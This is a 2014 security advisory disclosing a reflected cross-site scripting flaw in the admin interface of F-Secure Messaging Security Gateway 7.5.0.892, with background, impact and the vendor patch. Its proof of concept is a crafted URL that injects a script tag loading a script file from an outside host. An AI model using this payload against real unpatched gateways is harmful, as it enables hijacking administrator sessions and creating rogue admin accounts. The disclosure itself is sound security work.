F-Secure Messaging Security Gateway 7.5.0.892 Cross Site Scripting

2014-04-17T00:00:00
ID PACKETSTORM:126214
Type packetstorm
Reporter William Costa
Modified 2014-04-17T00:00:00

Description

                                        
                                            `I. VULNERABILITY  
  
-------------------------  
  
Reflected XSS Attacks vulnerabilities F-Secure Messaging Security Gateway  
V7.5.0.892  
  
II. BACKGROUND  
  
-------------------------  
  
F-Secure Messaging Security Gateway protects your company's  
confidential data. Users can easily send encrypted e-mails, and the  
system can automatically block or encrypt a message if it contains  
confidential data. Messaging Security Gateway also provides the most  
effective virus and spam filtering on the market, while automated  
management operations allow your IT administrators to focus on other  
tasks.  
  
  
  
III. DESCRIPTION  
  
-------------------------  
  
Has been detected a Reflected XSS vulnerability in F-Secure Messaging  
Security Gateway .  
  
The code injection is done through the parameter “NEW” in the page  
“/admin?module=SysUser&method=user&new=”  
  
  
  
IV. PROOF OF CONCEPT  
  
-------------------------  
  
The application does not validate the parameter “NEW” correctly.  
  
  
  
https://IP_FSecure:10000/admin?module=SysUser&method=user&new=1><script  
src=//10.0.1.120/f-secure/e.js  
  
  
  
  
CODE: e.js  
  
alert("F-Secure XSS");  
  
  
  
  
  
V. BUSINESS IMPACT  
  
-------------------------  
  
An attacker can execute arbitrary HTML or script code in a targeted  
  
user's browser, , that allows the execution of arbitrary HTML/script  
code to be executed in the context of the victim user's browser and  
create new user administrator.  
  
  
  
  
  
VI. SYSTEMS AFFECTED  
-------------------------  
  
Tested F-Secure Messaging Security Gateway V7.5.0.892 Virtual Appliance  
  
  
  
  
  
VII. SOLUTION  
-------------------------  
  
All data received by the application and that can be modified by the user,  
  
before making any kind of transaction with them must be validated corretely  
  
Upgrade to 7.5.0 Patch 1862 has been applied to all F-Secure Messaging  
Secure Gateway clusters.  
  
  
  
VII. REFERENCE  
  
http://www.f-secure.com/en/web/labs_global/fsc-2014-2  
  
  
By William Costa  
  
william.costa@gmail.com  
  
  
`